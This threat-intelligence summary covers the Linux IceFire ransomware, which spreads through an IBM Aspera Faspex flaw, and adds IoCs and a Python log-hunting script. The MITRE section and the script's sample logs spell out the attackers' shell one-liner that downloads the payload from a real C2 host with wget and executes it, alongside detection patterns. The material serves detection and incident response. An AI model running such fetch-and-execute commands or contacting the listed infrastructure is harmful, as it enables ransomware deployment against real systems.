IceFire has re-emerged with a Linux variant targeting enterprise networks, expanding beyond its earlier Windows-only focus. Operators exploit a deserialization vulnerability in IBM Aspera Faspex (CVE-2022-47986) to drop and execute a Linux payload that encrypts files and leaves a ransom note pointing victims to a payment portal on a Tor onion service. #IceFire #AsperaFaspex #CVE-2022-47986 #OnionService
Keypoints
- New Linux version of IceFire observed in enterprise environments, notably in the media and entertainment sector.
- Initial access achieved by exploiting CVE-2022-47986 in the IBM Aspera Faspex file-transfer server.
- Linux payload downloaded with wget from a DigitalOcean-hosted server (159.65.217.216, port 8080) and executed from /opt/aspera/faspex, the Faspex installation directory.
- Files encrypted and renamed with the .ifire extension; the binary self-deletes after execution.
- Ransom note is embedded in the binary and carries hardcoded credentials for a payment portal hosted on a Tor onion service.
- Critical system folders are excluded from encryption; user and shared directories (e.g., /home, /mnt, /media, /share) are targeted.
MITRE Techniques
- [T1190] Exploit Public-Facing Application - The Linux variant was deployed by exploiting CVE-2022-47986 in IBM Aspera Faspex file sharing software.
- [T1105] Ingress Tool Transfer - IceFire payloads are hosted on a remote server and downloaded (e.g., with wget) before execution: "wget hxxp[://]159.65.217.216:8080/{redacted_victim_server}/iFire"
- [T1059.004] Unix Shell - Deployment uses a shell one-liner to orchestrate the download and execution: "sh -c rm -f demo iFire && wget …"
- [T1486] Data Encrypted for Impact - Files are encrypted and renamed with the ".ifire" extension appended to the file name.
- [T1070.004] File Deletion - IceFire removes its own binary after execution.
Indicators of Compromise
- [SHA-1] b676c38d5c309b64ab98c2cd82044891134a9973 - Linux IceFire binary sample
- [IP] 159.65.217.216 - DigitalOcean host delivering payloads (over port 8080)
- [Domain] 7kstc545azxeahkduxmefgwqkrrhq3mzohkzqvrv7aekob7z3iwkqvyd.onion - Tor onion service hosting the ransom payment portal
- [URL] hxxp[://]159.65.217.216:8080/(…subdomain…|IP_Address)/iFire - payload delivery URL; the path component is the victim server's hostname or IP address
- [File Path] /opt/aspera/faspex - directory where the payload is saved and executed
- [File Path] /home/Jhone/Desktop - path string found in a cryptographic logging artifact embedded in the binary
- [File Extension] .ifire - extension appended to encrypted files
- [Cookie] _aspera_faspex_session - Aspera Faspex session cookie observed in the intrusion activity
- [RSA Public Key] - PEM block embedded in the binary (BEGIN RSA PUBLIC KEY … END RSA PUBLIC KEY)
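The MITRE techniques and the IoC list above describe one deployment chain: a shell one-liner fetches iFire from 159.65.217.216:8080, the payload runs from the Faspex directory, and files under user and shared trees gain the .ifire suffix. The following hunting script is an added example written for this summary, not code from SentinelOne or from the report. The indicators are the ones listed on this page; the log formats and sample lines are constructed for illustration, the tag strings other than the MITRE IDs are arbitrary labels, and the refang helper assumes the usual hxxp / [://] / [.] defanging conventions.

```python
"""Hunt for the IceFire Linux deployment chain in host and proxy logs.

Added example for this summary (not SentinelOne's code). Indicators are
taken from the report's IoC list; log formats and sample lines are
constructed.
"""
import re

# Indicators from the IoC list above.
C2_IP = "159.65.217.216"
C2_PORT = 8080
ONION = "7kstc545azxeahkduxmefgwqkrrhq3mzohkzqvrv7aekob7z3iwkqvyd.onion"
PAYLOAD_DIR = "/opt/aspera/faspex"
PAYLOAD_NAME = "iFire"
ENC_EXT = ".ifire"
# Trees the report says IceFire encrypts (system folders are excluded).
TARGETED_ROOTS = ("/home", "/mnt", "/media", "/share")

# Deployment one-liner pattern: remove stale copies, fetch the payload from
# the DigitalOcean host on port 8080, then execute it.
DEPLOY_RE = re.compile(
    r"sh\s+-c\s+.*\brm\s+-f\b.*&&\s*wget\b.*"
    + re.escape(f"{C2_IP}:{C2_PORT}/")
    + r"\S*/"
    + PAYLOAD_NAME
)


def refang(s: str) -> str:
    """Undo common defanging (assumed conventions) so IoCs match raw logs."""
    return (s.replace("hxxp", "http").replace("[://]", "://")
             .replace("[.]", ".").replace("[:]", ":"))


def in_targeted_tree(path: str) -> bool:
    """True if path lies under one of the user/shared roots IceFire targets."""
    return any(path == r or path.startswith(r + "/") for r in TARGETED_ROOTS)


def sweep(paths: list[str]) -> list[str]:
    """Narrow a list of observed paths to the trees worth checking for .ifire."""
    return [p for p in paths if in_targeted_tree(p)]


def scan_line(line: str) -> list[str]:
    """Return tags for every IceFire indicator present in one log line."""
    line = refang(line)
    hits = []
    if f"{C2_IP}:{C2_PORT}" in line and f"/{PAYLOAD_NAME}" in line:
        hits.append("T1105")            # payload download from the C2 host
    if DEPLOY_RE.search(line):
        hits.append("T1059.004")        # shell one-liner orchestrating it
    if PAYLOAD_DIR in line and PAYLOAD_NAME in line:
        hits.append("faspex-staging")   # payload living in the Faspex dir
    if ONION in line:
        hits.append("ransom-portal")    # onion address from the ransom note
    if any(tok.lower().endswith(ENC_EXT) for tok in line.split()):
        hits.append("T1486")            # file renamed with the .ifire suffix
    return hits


def hunt(lines: list[str]) -> dict[int, list[str]]:
    """Map line index -> tags for every line that matched at least one IoC."""
    return {i: h for i, l in enumerate(lines) if (h := scan_line(l))}


# Constructed sample records; the victim hostname is a placeholder.
SAMPLE_LOGS = [
    'auditd type=EXECVE cwd="/opt/aspera/faspex" argv="sh -c rm -f demo iFire '
    '&& wget http://159.65.217.216:8080/faspex.example.internal/iFire '
    '&& chmod +x iFire && ./iFire"',
    "2023-03-01T10:02:11Z proxy 159.65.217.216:8080 GET /faspex.example.internal/iFire 200",
    "fim RENAME /home/alice/reports/q4.xlsx -> /home/alice/reports/q4.xlsx.ifire",
    "cron run-parts /etc/cron.daily/backup rsync -a /home /mnt/backup",  # benign
    "note found: http://" + ONION + "/ login with the supplied credentials",
]

if __name__ == "__main__":
    for idx, tags in hunt(SAMPLE_LOGS).items():
        print(f"line {idx}: {', '.join(tags)}")
```

The benign cron line shows why the rules key on the full chain (IP plus port plus /iFire, or the rm/wget one-liner) rather than on wget or /home alone; `sweep` mirrors the report's targeting so a filesystem check for the .ifire suffix starts in the trees IceFire actually encrypts.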
Read more: https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/